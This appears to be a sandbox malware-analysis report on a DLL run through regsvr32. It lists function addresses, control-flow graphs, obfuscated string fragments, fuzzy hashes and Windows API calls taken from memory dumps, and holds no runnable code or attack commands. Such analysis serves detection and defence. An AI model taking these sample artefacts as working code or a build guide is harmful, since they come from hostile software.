                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 253 180007958-1800079e2 call 1800142a0 256 1800079e5-1800079eb 253->256 257 1800079f1 256->257 258 180007f68-180007f6e 256->258 261 180007eb7-180007f4d call 180021434 257->261 262 1800079f7-1800079fd 257->262 259 180008084-180008101 call 180021434 258->259 260 180007f74-180007f7a 258->260 279 180008103-180008108 259->279 280 18000810d 259->280 265 180007fb4-180008075 call 18001e794 260->265 266 180007f7c-180007f82 260->266 271 180007f52-180007f58 261->271 267 180007d01-180007e4c call 180008738 262->267 268 180007a03-180007a09 262->268 278 18000807a-18000807f 265->278 272 180007f84-180007f8a 266->272 273 180007f9a-180007faf 266->273 267->278 290 180007e52-180007eaf call 18001d408 267->290 274 180007c76-180007cf7 call 180013e28 268->274 275 180007a0f-180007a15 268->275 281 1800081dd-1800081fd 271->281 282 180007f5e 271->282 284 18000811e-180008124 272->284 285 180007f90-180007f95 272->285 273->256 274->267 286 180007a1b-180007a21 275->286 287 180007b1d-180007c71 call 180018c60 call 180001b1c 275->287 292 180007b0c-180007b18 279->292 293 180008112-18000811b 280->293 282->258 284->281 294 18000812a 284->294 285->256 288 180007a27-180007a2d 286->288 289 18000812f-1800081d8 call 180013e28 286->289 287->293 288->284 296 180007a33-180007af3 call 18002b4c4 288->296 289->281 290->261 292->256 293->284 294->256 303 180007af8-180007b06 296->303 303->292
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                                                                                • API String ID: 0-4168131144
                                                                                                                                • Opcode ID: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                                                                                • Opcode Fuzzy Hash: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 355 180010ff4-180011016 356 180011020 355->356 357 180011022-180011028 356->357 358 180011814 357->358 359 18001102e-180011034 357->359 360 180011819-18001181f 358->360 361 1800114e2-1800114ec 359->361 362 18001103a-180011040 359->362 360->357 363 180011825-180011832 360->363 366 1800114f5-18001151d 361->366 367 1800114ee-1800114f3 361->367 364 1800113e2-1800114d2 call 180008200 362->364 365 180011046-18001104c 362->365 364->363 374 1800114d8-1800114dd 364->374 365->360 369 180011052-18001120b call 180021040 call 1800291ac 365->369 370 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 366->370 367->370 381 180011212-1800113d7 call 1800291ac call 18001e2bc 369->381 382 18001120d 369->382 384 1800117f9-180011803 370->384 374->357 381->363 390 1800113dd 381->390 382->381 384->363 386 180011805-18001180f 384->386 386->357 390->356
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 391 180021618-180021653 392 180021655-18002165a 391->392 393 180021bf3-180021c25 392->393 394 180021660-180021665 392->394 395 180021c2a-180021c2f 393->395 396 180021a81-180021bda call 180016314 394->396 397 18002166b-180021670 394->397 399 180021838-180021845 395->399 400 180021c35 395->400 403 180021bdf-180021bee 396->403 401 1800219f3-180021a7c call 180001b1c 397->401 402 180021676-18002167b 397->402 400->392 401->392 404 1800219e4-1800219ee 402->404 405 180021681-180021686 402->405 403->392 404->392 407 1800219d5-1800219df call 18001dfb4 405->407 408 18002168c-180021691 405->408 407->392 410 180021697-18002169c 408->410 411 18002190c-1800219a5 call 18000abac 408->411 414 1800216a2-1800216a7 410->414 415 180021846-180021907 call 180021434 410->415 418 1800219aa-1800219b0 411->418 414->395 419 1800216ad-180021835 call 180008200 call 1800166c0 414->419 415->392 421 1800219b2-1800219c6 418->421 422 1800219cb-1800219d0 418->422 419->399 421->392 422->392
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180028C20 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 456 180028c20-180028c53 457 180028c58-180028c5e 456->457 458 180028c64-180028c6a 457->458 459 1800290ae-180029147 call 180013e28 457->459 460 1800290a4-1800290a9 458->460 461 180028c70-180028c76 458->461 469 18002914c-180029152 459->469 460->457 463 180029003-18002909f call 180008ea0 461->463 464 180028c7c-180028c82 461->464 463->457 467 180028c88-180028c8e 464->467 468 180028fab-180028ffe call 1800223c4 464->468 474 180028c94-180028c9a 467->474 475 180028df6-180028e1e 467->475 468->457 470 180029154 469->470 471 18002919c-1800291a8 469->471 470->457 476 180028d62-180028ddb call 180016bd8 474->476 477 180028ca0-180028ca6 474->477 475->457 479 180028e24-180028e3c 475->479 487 180028de0-180028de6 476->487 480 180028cac-180028cb2 477->480 481 180029159-180029197 call 1800164c8 477->481 483 180028e42-180028ee6 call 18001d49c 479->483 484 180028ee9-180028f0b 479->484 480->469 485 180028cb8-180028d5d call 180010c00 480->485 481->471 483->484 489 180028f94-180028f95 484->489 490 180028f11-180028f92 call 18001d49c 484->490 485->457 487->471 494 180028dec-180028df1 487->494 493 180028f98-180028f9b 489->493 490->493 493->457 498 180028fa1-180028fa6 493->498 494->457 498->457
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: :G$Q27$_5$yy8x$Mh
                                                                                                                                • API String ID: 0-3587547327
                                                                                                                                • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                                                                                • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 499 18000c608-18000c62d 500 18000c632-18000c637 499->500 501 18000cc8a-18000cc8f 500->501 502 18000c63d 500->502 503 18000cc95-18000cc9a 501->503 504 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 501->504 505 18000c643-18000c648 502->505 506 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 502->506 507 18000ce33-18000ced7 call 180008ad8 call 18001c32c 503->507 508 18000cca0-18000cca5 503->508 538 18000cfb4-18000d00a call 1800194a4 504->538 509 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 505->509 510 18000c64e-18000c653 505->510 541 18000cc28-18000cc85 call 1800194a4 506->541 542 18000cedc-18000cf26 call 1800194a4 507->542 513 18000cd35-18000cdce call 18000703c call 18001c32c 508->513 514 18000ccab-18000ccb0 508->514 509->500 516 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 510->516 517 18000c659-18000c65e 510->517 556 18000cdd3-18000ce2e call 1800194a4 513->556 521 18000ccb6-18000cd30 call 180021434 514->521 522 18000d00f-18000d014 514->522 516->500 524 18000c664-18000c669 517->524 525 18000c8bb-18000c963 call 180002610 call 18001c32c 517->525 521->500 522->500 539 18000d01a-18000d020 522->539 534 18000c7b2-18000c85a call 180019618 call 18001c32c 524->534 535 18000c66f-18000c674 524->535 564 18000c968-18000c9bc call 1800194a4 525->564 568 18000c85f-18000c8b6 call 1800194a4 534->568 535->522 545 18000c67a-18000c73d call 180002178 call 18001c32c 535->545 538->522 541->500 542->500 574 18000c742-18000c7ad call 1800194a4 545->574 556->500 564->500 568->500 574->500
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180013E28 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: %'#$'1O"
                                                                                                                                • API String ID: 0-3508158491
                                                                                                                                • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                                • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001C964 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: xDC
                                                                                                                                • API String ID: 0-90241050
                                                                                                                                • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                                • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92154 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 153 7fffefb92154-7fffefb92160 154 7fffefb921e1-7fffefb921e3 153->154 155 7fffefb92162-7fffefb9216b call 7fffefb94110 153->155 157 7fffefb9221e-7fffefb92221 154->157 158 7fffefb921e5-7fffefb921ed 154->158 162 7fffefb9216d-7fffefb9216f 155->162 167 7fffefb92174-7fffefb9217b call 7fffefb92fa0 155->167 159 7fffefb92279-7fffefb9227c 157->159 160 7fffefb92223-7fffefb92232 call 7fffefb92c88 call 7fffefb93108 157->160 158->162 163 7fffefb921f3-7fffefb92201 158->163 164 7fffefb9227e-7fffefb92280 call 7fffefb92f50 159->164 165 7fffefb92285 159->165 180 7fffefb92237-7fffefb9223d 160->180 168 7fffefb9228a-7fffefb9228f 162->168 169 7fffefb92208-7fffefb9220b 163->169 170 7fffefb92203 call 7fffefb936d0 163->170 164->165 165->168 181 7fffefb9217d-7fffefb92182 call 7fffefb9415c 167->181 182 7fffefb92184-7fffefb921a9 call 7fffefb940a0 GetCommandLineA call 7fffefb93eec call 7fffefb93758 167->182 169->165 175 7fffefb9220d-7fffefb9221c call 7fffefb93a48 call 7fffefb92c94 call 7fffefb9415c 169->175 170->169 175->165 180->162 186 7fffefb92243-7fffefb92257 FlsSetValue 180->186 181->162 202 7fffefb921ab-7fffefb921b0 call 7fffefb92c94 182->202 203 7fffefb921b2-7fffefb921b9 call 7fffefb93df4 182->203 190 7fffefb92259-7fffefb9226d call 7fffefb92cbc GetCurrentThreadId 186->190 191 7fffefb9226f-7fffefb92274 call 7fffefb93024 186->191 190->165 191->162 202->181 208 7fffefb921da-7fffefb921df call 7fffefb93a48 203->208 209 7fffefb921bb-7fffefb921c2 call 7fffefb93aec 203->209 208->202 209->208 214 7fffefb921c4-7fffefb921c6 call 7fffefb9347c 209->214 216 7fffefb921cb-7fffefb921cd 214->216 216->208 217 7fffefb921cf-7fffefb921d5 216->217 217->165
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB94110: HeapCreate.KERNELBASE(?,?,?,?,00007FFFEFB92169), ref: 00007FFFEFB94122
                                                                                                                                  • Part of subcall function 00007FFFEFB94110: HeapSetInformation.KERNEL32 ref: 00007FFFEFB9414C
                                                                                                                                • _RTC_Initialize.LIBCMT ref: 00007FFFEFB92184
                                                                                                                                • GetCommandLineA.KERNEL32 ref: 00007FFFEFB92189
                                                                                                                                  • Part of subcall function 00007FFFEFB93EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB9219B), ref: 00007FFFEFB93F1B
                                                                                                                                  • Part of subcall function 00007FFFEFB93EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB9219B), ref: 00007FFFEFB93F5B
                                                                                                                                  • Part of subcall function 00007FFFEFB93758: GetStartupInfoA.KERNEL32 ref: 00007FFFEFB9377D
                                                                                                                                • __setargv.LIBCMT ref: 00007FFFEFB921B2
                                                                                                                                • _cinit.LIBCMT ref: 00007FFFEFB921C6
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: FlsFree.KERNEL32(?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB92CA3
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB96A32
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: free.LIBCMT ref: 00007FFFEFB96A3B
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB96A5B
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FFFEFB9224C
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB92260
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9226F
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1549890855-0
                                                                                                                                • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                • Instruction ID: 65fd415d7e10d2997173d958b7f9083a7ff3a4e5812450233de69db605838476
                                                                                                                                • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                • Instruction Fuzzy Hash: C6311820F0D61381FAA877B5990237E31E96F55770F248134DA2E856F7EE2CF8648223
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB94CD4 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • _getptd.LIBCMT ref: 00007FFFEFB94CF3
                                                                                                                                  • Part of subcall function 00007FFFEFB9497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB94D0E,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB949A6
                                                                                                                                  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94D7F
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB94DB7
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94E67
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94E97
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB94E9C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1264244385-0
                                                                                                                                • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                • Instruction ID: 02c04e822c3bbe073b41f1a1c21a334b3669f95eac36baa868096f56654f0ed0
                                                                                                                                • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                • Instruction Fuzzy Hash: 1D516C22A08A8386E7589B65A440379B7E6FF84B64F14C236DA5E4B3F5DF3CE4458702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB96C34 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 502529563-0
                                                                                                                                • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                • Instruction ID: df8da3acf5cff88c58eee8e1efc71b7c12fd892779a43d62db970be13d5271f2
                                                                                                                                • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                • Instruction Fuzzy Hash: C0113C25A0D64381FA55ABA1E81137936E6EF84BF0F544630EA1E57BF6DE3CE4408713
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB91EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
